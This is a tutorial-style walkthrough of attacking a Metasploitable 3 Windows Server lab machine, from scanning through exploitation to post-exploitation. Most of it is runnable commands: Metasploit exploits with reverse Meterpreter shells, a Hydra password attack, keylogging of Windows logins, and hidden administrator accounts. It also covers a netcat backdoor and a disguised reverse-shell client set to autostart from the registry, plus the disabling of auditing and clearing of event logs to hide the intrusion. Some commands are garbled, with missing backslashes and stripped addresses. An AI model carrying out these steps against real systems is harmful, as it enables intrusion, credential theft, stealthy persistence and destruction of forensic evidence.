To conduct an effective penetration testing, proposing a framework and list the suitable tools and techniques under each phase and follow the framework is the best method because, during the penetration testing, it is easy to choose the best tool and technique for each phase. This guide shows the attack phase of the penetration testing. Attack phase has following phases. Those are
reconnaissance, scanning, getting access, maintaining access and covering tracks.

How to Exploit Metasploitable 3 Windows Server VM and Conduct Post Exploitation

1. Intelligence gathering:

In this phase, a pen tester learns about how the target machine operates,
behaves and information about the system such as running services, operating
system and service versions using scanning tools like Nmap.
services and service version and operating system have been collected using

Type sudo nmap -sV -version-intensity 9

–version-intensity 9 is assigning value 9 for all probe packets, thus
increases version detection for uncommon applications.

Nmap version detection

1.1 Find vulnerabilities using social engineering:

Once running services and versions are identified, pen tester can use:

Microsoft Security Response Center’s security bulletins.

Microsoft security response center

Exploit database: It contains exploit code for the vulnerability. This
exploit code can be executed directly from the terminal or executed from the
Metasploit tool. To import to the Metasploit tool, ruby code file (exploit.rb)
should be placed under the exploit folder in the Metasploit tool.
Finally, we do need to reload the Metasploit by typing reload_all.

exploit database

CVE details website: It has listed multi vendors product’s

cve details

SPLOITUS search engine: it will provide appropriate tools and exploits
based on the keyword.

sploitus search engine

1.2 Vulnerability scanning:

In vulnerability scanning phase, the target system will be scanned with
popular tools like Nessus, open vas, Nexpose. They keep the vulnerability
database to detect the system vulnerabilities. OpenVAS has been used to find
the vulnerabilities of the windows server 200.

openvas scan target and scan config
openvas vulnerabilities list


In this phase, the pen tester will exploit the vulnerability that existed in
the system with the help of varieties of tools and techniques. Tools:-
Metasploit framework, core impact, canvas, sqlmap, and using exploit code
found in the

2.1 Exploit Using Microsoft Windows SMB Server CVE-2017-0143 Remote Code
Execution Vulnerability

Open terminal and Start PostgreSQL database by typing
service PostgreSQL start.

Initialize Metasploit framework by typing msfconsole. Find exploit by
typing search cve:2017-0143.

Start PostgreSQL search cve:

Select suitable exploit by typing use and copy and paste it as shown
below then press enter. Type show options command and press
enter to display the required parameters to be set to successful

show options

Set remote host by typing set rhost Set localhost by
typing set lhost .

Localhost is attacker pc that listens for inbound connection when reverse TCP
shell payload is used. Type show payloads command to display all
available payloads.

set rhost set lhost show payloads

Set suitable payload by typing set payload and copy and paste it as
shown below. Note: the meterpreter shell has more options to control the
compromised host. Reverse TCP is used instead of bind TCP because to bypass
the firewall by asking the compromised host to initiate the TCP connection
(outbound flow is allowed by the firewall by default). Finally type
run command to start the exploitation process.

Successfully exploited and Meterpreter session is opened.

2.2 Exploit Using Elastic Search Code Execution Vulnerability

Initialize MSF console and type search cve:2014-3120.

Select suitable exploit and type
use exploit/multi/elasticsearch/script_mvel_rce and press enter

Type show options.

Type the following commands Set rhost
Set lhost Show payloads
Set payload java/meterpreter/reverse_tcp

2.3 Exploit Using Axis2 Default Administrator Password Vulnerability

The axis2 administrator account has the default password, it can be found in
the vendor website otherwise Online dictionary attack can be launch.

To start dictionary attack type
Hydra -s 8282 -v -V -L /home/subaharan/Desktop/us.txt -P
/home/subaharan/Desktop/pass.txt HTTP-post-form “/axis2/axis2
auth credentials!”
and press enter.

-s –service port, -V -verbose, -L- location of the username list
file, –P –location of the password list file, is
the IP address of the target, HTTP-post-form – HTTP method that needs
to be used, /axis2/axis2-admin -location of the HTTP login form.
/login:username=^USER^&password=^PASS^ &submit=+Login+ – body
of the HTTP post method. Invalid auth credentials! -error message.

Type search cve:2010-0219 Type
use exploit/multi/http/axis2_deployer

search cve:2010-0219

Type set rhost Type set lhost Type
set rport 8282 Type show payloads Type
set payload java/meterpreter/reverse_tcp

set rhost

Type run


2.4 Exploit Using ManageEngine Desktop Central 9 Fileuploadservlet
Connectionid Vulnerability

Type search cve:2015-8249 Type
use exploit/windows/http/manageengine_connectionid_write Type
show options

search cve:2015-8249

Type set rhost Type set lhost Type
show payloads

set rhost

Type Set payload windows/meterpretor/reverse_tcp Type run

Set payload

2.5 Exploit Using Java JMX Server Insecure Configuration Java Code Execution

Type search:2015-2342 Type
use exploit/multi/misc/java_jmx_server Type show options


Type set rhost Type srvhost Type
set rport 1617 Type show payloads Type
set payload java/meterpreter/reverse_tcp

set rhost

Type run


3. Maintaining access

In this phase penetration tester will keyloggers, backdoors, etc for later
system access.
Tools- Netcat, Metasploit, Power spy

3.1 Enabling keylogger function to maintain access

Type ps to list the running process on the target.


The executed code should be migrated from the SMB process to explorer process to
capture the keystroke. type migrate 1132 to migrate to explorer process.
Type getpid to verify Type keyscan_start to begin the capturing
process Finally, The Keyscan_dump command should be given to extract the
captured data.

migrated from the SMB process to explorer process

To capture the windows login username and password, the running code should be
moved to winlogon.exe process. Type migrate 412

Type getpid to verify Type keyscan_start to start the capturing
process. Type keyscan_dump to extract the captured data.

running code should be moved to winlogon.exe process

3.2 Create a new account to maintaining access.

Type shell to open the windows shell. Type
net user /add suba suba12345 to create a new user account. Type
netlocalgroup administrators suba /add to add the user Suba to
administrators group so that user can have full power to execute any tasks


Open the new terminal and type ssh -l suba to access the
target host via ssh. -l means username for ssh. is
the IP address of the target host.

access the target host via ssh

3.3 Create a hidden user account and enable remote desktop protocol for
maintain access.

Type shell Type net user suba12 suba12345 /add Type
net localgroup “Administrators” /add suba12

Type net localgroup “Users” /del suba12 to delete suba12 from Users

delete suba12 from Users group

reg add “HKLMSOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserList” /v suba12 /t REG_DWORD
/d 0 /f
to add the user suba12 to a special account list /v -name of the key
/t -data type of the key /d -value of the key /f -add the
registry key without prompting confirmation.

reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem /v
dontdisplaylastusername /t REG_DWORD /d 1 /f

to Hide the user name

Hide the user name


reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

to enable the remote desktop protocol.

reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Serverwinstationsrdp-tcp” /v PortNumber /t REG_DWORD /d 0x4B2 /f

to change from default tcp port to port 1202. So that administrators may think
rdp is not running.

change from default tcp port to port 1202

netsh advfirewall firewall add rule name=”Open Port 1202″ dir=in
action=allow protocol=TCP localport=1202

to Add a rule in the windows firewall to allow inbound connection to the new
port 1202.

Add a rule in the windows firewall to allow inbound connection to the new port 1202.

Type net stop termservice to stop terminal service.

stop terminal service

Type net start termservice to start terminal service .

start terminal service

Finally, install Rdesktop utility by typing
sudo apt install rdesktop .

install Rdesktop utility

Connect to the target by typing rdesktop -u suba12
1202 is the new TCP port that RDP is listening .

Connect to the target by rdp

3.4 Upload Netcat as a backdoor for maintain access.

Meterpreter shell has file uploading ability based on the vulnerability. Type
upload /home/subaharan/Desktop/netcat-win32-1.12/nc64.exe

The first argument is the location of the file that needs to be uploaded and
second is the directory in the target.

view the keys present in the above directory. These processes will start
automatically during system booting.

view starting  automatically during system booting

reg setval -k HKLM\Software\Microsoft\Windows\Currentversion\run -V nc
-d “C:WindowsSystem32nc64.exe -ldp 455 -e cmd.exe”

to make the netcat to automatically start during system startup. 445 is a port
that netcat is listening for an inbound connection. -e allows executing the
parameter with the full path to the netcat.

reg queryval -k HKLM\Software\Microsoft\Windows\Currentversion\run
to verify that the key has been added successfully.

automatically start during system startup

Type shell to access windows command shell. Type
netsh advfirewall firewall add rule name=” open port 455″ dir=in action
=allow protocol=TCP localport=455

to allow inbound connection to TCP port 455. dir is the direction
whether it’s inbound or outbound

allow inbound connection to TCP port 455

Finally, open a new terminal and type nc -v 455 to connect
to the target host and get shell access. 455 is the port that Netcat is
listening. -v is to enable verbosely.

connect to the target host and get shell access

3.5 Install a persistent reverse tcp client for maintain access.

upload “home/subaharan/Desktop/RuntimeBroker.exe” c:\windows to upload
the Runtimebroker.exe file to the target. This is a reverse TCP shell client.
RuntimeBroker name has been given to avoid detection from IT administrators.

Type shell to access windows shell prompt. Type
reg add HKLMsoftwaremicrosoftwindowscurrentversionrun /v RuntimeBroker
/t REG_SZ /d “c:windowsRuntimeBroker.exe” /f
to add a registry key so that it will be start automatically during system

Type C:windowsRuntimeBroker.exe to execute the reverse TCP shell
client. This program is designed to send a TCP syn request to the reverse TCP
shell server, if the server is not enabled then the program will stay sleep
for the defined time and then again send a sync request to the server until
the server is available.

upload the Runtimebroker.exe file to the target.

Type tasklist to list the running process on the remote target.

list the running process on the remote target.
task list

Open new terminal and type
python ‘/home/subaharan/Desktop/Server-TCPReverse’ to run the
reverse TCP shell server. Below figure shows that TCP syn request did come
from the client and shell access has been established.

run the reverse TCP shell server

Metasploit can also be used as reverse TCP shell server. Type
use exploit/multi/handler Type
set lhost to set the local host IP address Type
set lport 4000 to listen to the server on TCP port 4000 Type
set payload python/shell_reverse_tcp Type run

Metasploit multi handler

4 Cover tracks

In this phase, pentester will clear the evidence that created during
Tools- Auditpol, EventViewer, Metasploit

4.1 Clear windows logs from Meterpreter Shell

Type clearv to remove logging records.

remove logging records.

4.2 Turn off windows auditing for covering tracks

Type shell to access windows shell. Type auditpol /clear to stop
the windows auditing.

stop the windows auditing.

Type auditpol /get /category:* to verify whether the auditing is

verify whether the auditing is stopped.

4.3 Clear windows logs from the windows shell for cover tracks

Issue shell command from Meterpreter shell to migrate to windows shell.
Type wevtutil enum-logs to enumerate the events.

Meterpreter shell to migrate to windows shell

To clear the logs, type the following commands one by one
Wevtutil clear-log application
Wevtutil clear-log security
Wevtutil clear-log setup
Wevtutil clear-log system

To clear the windows logs
Show Comments (0)

Leave a Reply

Your email address will not be published. Required fields are marked *